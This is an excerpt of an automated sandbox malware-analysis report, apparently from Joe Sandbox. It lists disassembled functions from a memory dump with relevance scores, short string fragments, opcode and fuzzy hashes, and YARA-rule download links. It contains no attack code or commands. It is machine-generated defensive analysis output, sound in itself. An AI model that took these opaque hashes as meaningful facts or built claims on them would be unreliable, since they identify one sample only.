                                                  • Opcode ID: d4326323aef42858783dea4c8f76e1c120c1960e8e3e5c0b5113dee6929b941e
                                                  • Instruction ID: 767707e91245ba38891a6cca389acff6c3fe92babc1fe17ee53108fbe54eff3b
                                                  • Opcode Fuzzy Hash: d4326323aef42858783dea4c8f76e1c120c1960e8e3e5c0b5113dee6929b941e
                                                  • Instruction Fuzzy Hash: 25D1CC365686198BC72CEE5CE8C14F6B3D2EBC5311F10862ED9C7C71A5EB30951B8AC2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8AC75 Relevance: 4.1, Strings: 3, Instructions: 384COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 81$Ipn$a<w
                                                  • API String ID: 0-30878643
                                                  • Opcode ID: 17c90dc42da6a7362108683161ef50a9d8a1df722387d85421818cd1afdd89ed
                                                  • Instruction ID: a1b625ac53215fddf85c8cc03b3d43c80436f05f0c1b042243bd7627f1fbb9dd
                                                  • Opcode Fuzzy Hash: 17c90dc42da6a7362108683161ef50a9d8a1df722387d85421818cd1afdd89ed
                                                  • Instruction Fuzzy Hash: 50C1CC36504B52CBD716CF34A8966D9BBA1FF53320B5C479DC4C2CB2A6D322D50ACBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B4206E Relevance: 4.1, Strings: 3, Instructions: 368COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: '$]$^
                                                  • API String ID: 0-2211192022
                                                  • Opcode ID: 5e238d7fda4e9e3d258098e8aae41a093178c8d81dd43b8b6690bd17dd72ace1
                                                  • Instruction ID: 3dab95a73bbc41550e90629a3d521c4e443ce6bef38237019bf7416f47363122
                                                  • Opcode Fuzzy Hash: 5e238d7fda4e9e3d258098e8aae41a093178c8d81dd43b8b6690bd17dd72ace1
                                                  • Instruction Fuzzy Hash: 59D1A9312086528FC319DF28D4908FBB7E2FFD9314F208A7ED0968B695E734552ADB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D0B449 Relevance: 4.1, Strings: 3, Instructions: 351COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$+$A
                                                  • API String ID: 0-2872615681
                                                  • Opcode ID: c2581c1cf2e2c3e86929fe78f3c48c36a2ace723a32f46e48022edcf93224944
                                                  • Instruction ID: 67554e092007b132b43e2c54accb16b4ad15bb7726eb97229b9574ccd12f2db4
                                                  • Opcode Fuzzy Hash: c2581c1cf2e2c3e86929fe78f3c48c36a2ace723a32f46e48022edcf93224944
                                                  • Instruction Fuzzy Hash: 40B1A936618B8A8BC71CDE28D4925F673D6EBC2311F248A3DD4D7871A2CB355457CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B5F274 Relevance: 4.0, Strings: 3, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$5*@$p
                                                  • API String ID: 0-1224031320
                                                  • Opcode ID: 636862a418259c5be000bb2adb120f5f5765806a8e2b9c6a4044429b3f7f829a
                                                  • Instruction ID: f88f242db806ea0f77e0188992081f484a7fb4fc9733fea8e8e1bbd4821a021c
                                                  • Opcode Fuzzy Hash: 636862a418259c5be000bb2adb120f5f5765806a8e2b9c6a4044429b3f7f829a
                                                  • Instruction Fuzzy Hash: 78818C355086168BC31CDB18D4525FA73D2EBD4310F11C97EE88BCB285DB74A91BCAC1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B4CA4E Relevance: 4.0, Strings: 3, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$E$[
                                                  • API String ID: 0-3968039136
                                                  • Opcode ID: 0f2c22389be833a9ebe1f86e0a8458d6993ca5b3904dc2783324bfda1010106c
                                                  • Instruction ID: 717ee5230f3d90d51b3043dca79809c4a4f7a359b9ec49e4de523e376a8dcd6b
                                                  • Opcode Fuzzy Hash: 0f2c22389be833a9ebe1f86e0a8458d6993ca5b3904dc2783324bfda1010106c
                                                  • Instruction Fuzzy Hash: 2B81AD316082168BDB18DF28E4505BBB3E1FBC5310F54C67DE596CB1C1EB74A51ACB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00DCFC8D Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &$C$F
                                                  • API String ID: 0-3145212746
                                                  • Opcode ID: b312e1c1f86b2b6c11709653874041d9fe06849a0736f50ad6f0d04d64f90f36
                                                  • Instruction ID: e41f2bbc499cd3102a26f9c5aaf36572bb150845cc5a9238ca191e6ca79e1ce2
                                                  • Opcode Fuzzy Hash: b312e1c1f86b2b6c11709653874041d9fe06849a0736f50ad6f0d04d64f90f36
                                                  • Instruction Fuzzy Hash: 287196360187428BD31DDF38D8925FA73E2EFC1320F588A6DE59A835C5DB399516CB06
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C6B67F Relevance: 3.9, Strings: 3, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$&$/
                                                  • API String ID: 0-3150618653
                                                  • Opcode ID: 768b111acd838b78b192e6916ae3b378375e417ffca695e24a6e3e7b9862ebef
                                                  • Instruction ID: 4de3303bcbb99d1c2225bb7e78b955d1e77ff2bc3c6e65c2363ed148351e8cee
                                                  • Opcode Fuzzy Hash: 768b111acd838b78b192e6916ae3b378375e417ffca695e24a6e3e7b9862ebef
                                                  • Instruction Fuzzy Hash: 15517635518B964BC71DEF2898451AAB3E2EFC1310F11DB2ED6DAC71CACB749046CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D000B8 Relevance: 3.9, Strings: 3, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$c$g
                                                  • API String ID: 0-4281089589
                                                  • Opcode ID: 5464b4ae644ad72cddcb86b1c68e5e4891257f460fb4d7e96c1dbd1566cbaaad
                                                  • Instruction ID: a30ce2a241dddd9fb959cd9c138c4f3bc705e85160ddbe8e5184c87aee036d7f
                                                  • Opcode Fuzzy Hash: 5464b4ae644ad72cddcb86b1c68e5e4891257f460fb4d7e96c1dbd1566cbaaad
                                                  • Instruction Fuzzy Hash: 747125352187428BC718EB34D4915AAB3E2FFD4311F14CAAEE4A6875D1EB34A519CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B7C691 Relevance: 3.9, Strings: 3, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$]$d
                                                  • API String ID: 0-1221633813
                                                  • Opcode ID: e07ecc4e8f9434b0ebad17e3a9585a86ee663170f87def7f8483e092faca65c1
                                                  • Instruction ID: 4e704ff23dfa389a02ef1d794db6dae44fe6d472db6900ef4b05336bf8e0f9b6
                                                  • Opcode Fuzzy Hash: e07ecc4e8f9434b0ebad17e3a9585a86ee663170f87def7f8483e092faca65c1
                                                  • Instruction Fuzzy Hash: E76167352083128BC319DF28E490ABBB3E1FFC5310F64897DD09687984EB75652ECB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C19BCF Relevance: 3.9, Strings: 3, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$?|;L$]
                                                  • API String ID: 0-3250245087
                                                  • Opcode ID: b8f7bd554cc2e6ba79afc591a59020d1fd3f56bb47ea5cc3a6390f68ec65762a
                                                  • Instruction ID: d8b51ca0add693df46a8e6e83d739f9fae2ad4fc41a125ec8dfa34edaf3076e1
                                                  • Opcode Fuzzy Hash: b8f7bd554cc2e6ba79afc591a59020d1fd3f56bb47ea5cc3a6390f68ec65762a
                                                  • Instruction Fuzzy Hash: 0F5199357083128BC31CDF68D4909BAB3E2FBC9301F61896EE197C7684DB30A915CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00BD8F76 Relevance: 3.9, Strings: 3, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$J$a
                                                  • API String ID: 0-567535215
                                                  • Opcode ID: 16cbfc1dbfe1207175f0d5b0dd0a09d633dc57cd85b123d4792c5640c066a38e
                                                  • Instruction ID: 1d41439eba3f87920700a8f3d3745d0228cc76bd180225731c45a23112b70eec
                                                  • Opcode Fuzzy Hash: 16cbfc1dbfe1207175f0d5b0dd0a09d633dc57cd85b123d4792c5640c066a38e
                                                  • Instruction Fuzzy Hash: 2C41543041CB868BD319EF19E8854E7B3DAFBC1310F20867EC4CAC2195C6356862DF8A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E00D4B Relevance: 3.9, Strings: 3, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A$L$c
                                                  • API String ID: 0-3492944749
                                                  • Opcode ID: 8765629c6749f387fc5b97227dcca81f18916e8fc9dc73914928289b11c25896
                                                  • Instruction ID: 51ec72e92b70f965df9300e7b4a6303a5e953dabe2d1031f07588760ccd4f5da
                                                  • Opcode Fuzzy Hash: 8765629c6749f387fc5b97227dcca81f18916e8fc9dc73914928289b11c25896
                                                  • Instruction Fuzzy Hash: F841AC210047228BEB09EF39D4605EBB3E2EFC6310F55CB3CD4918B189D3399516CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00BBE1B4 Relevance: 3.8, Strings: 3, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "$E$h
                                                  • API String ID: 0-2527327479
                                                  • Opcode ID: 789fb9e83954c17e0d7998b28ebe4fbe829df80b6a95244327b5c55a2bc36f3d
                                                  • Instruction ID: 4ead103b6b1662765213dbc86425aa2f9fafeab02b555bffc6d74255e82df0db
                                                  • Opcode Fuzzy Hash: 789fb9e83954c17e0d7998b28ebe4fbe829df80b6a95244327b5c55a2bc36f3d
                                                  • Instruction Fuzzy Hash: 234166712086178FE399EE29D8509B7B2E2FFD4310F508B7DE45AC3288E7755829CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B54A81 Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3$b$l
                                                  • API String ID: 0-4048346809
                                                  • Opcode ID: dcadf6b83d65a1993ebbac07821aa34a09e05409a778dd5e7a0c23ccbda8bbf4
                                                  • Instruction ID: 9e1e194b42e43b94e4c85b660e1cbb4adac445b55c5da16d84cb63a2b833043b
                                                  • Opcode Fuzzy Hash: dcadf6b83d65a1993ebbac07821aa34a09e05409a778dd5e7a0c23ccbda8bbf4
                                                  • Instruction Fuzzy Hash: FD318931218B42DBD714AB38DC815DB77A2EBC5324F14CB3DE0AA8B1D2D7798006DB06
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF5570 Relevance: 3.4, Strings: 2, Instructions: 884COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$8
                                                  • API String ID: 0-46163386
                                                  • Opcode ID: 2351489b50fa69439059f7219dfc3128cdea03aa92ee8fab3fd736ead12e5b55
                                                  • Instruction ID: 6a7090dd32597387fe46e1828ddb2569c816c86c74f14faa850a0c1524e58b98
                                                  • Opcode Fuzzy Hash: 2351489b50fa69439059f7219dfc3128cdea03aa92ee8fab3fd736ead12e5b55
                                                  • Instruction Fuzzy Hash: 7D828A71A087449FD720CF68C8807ABBBE2BF98314F58891CFA998B351D775D944CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B5B1D2 Relevance: 3.1, Strings: 2, Instructions: 562COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$M
                                                  • API String ID: 0-964750245
                                                  • Opcode ID: 6ed6a7fafea2dd2fa10c42a24380e9c90924b4787b3f38b405696480af5efc88
                                                  • Instruction ID: ae88c57c0b0b21ce66fbad4be0fc6b962c03b2e09b1102022f02c8ba98303e7f
                                                  • Opcode Fuzzy Hash: 6ed6a7fafea2dd2fa10c42a24380e9c90924b4787b3f38b405696480af5efc88
                                                  • Instruction Fuzzy Hash: 2B12CB711086128BC70CDF68E8905AB73E2EBC5321F60CB3DE596CB6C5EB399516CB45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B57D47 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$e
                                                  • API String ID: 0-27444873
                                                  • Opcode ID: cc95cbbaeb3a8abfb240438d0c57931c7c76c3e2a3784cdd95d4e72e26c33bd2
                                                  • Instruction ID: 7a22209f299c230d04f8be6a0fe7f537272a57595b4742ef651bdfa4a900b287
                                                  • Opcode Fuzzy Hash: cc95cbbaeb3a8abfb240438d0c57931c7c76c3e2a3784cdd95d4e72e26c33bd2
                                                  • Instruction Fuzzy Hash: BFC1AB716487168BC70DEF28E8818BAB3E2EFC5311F14C63ED59B87694D734A51ACB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

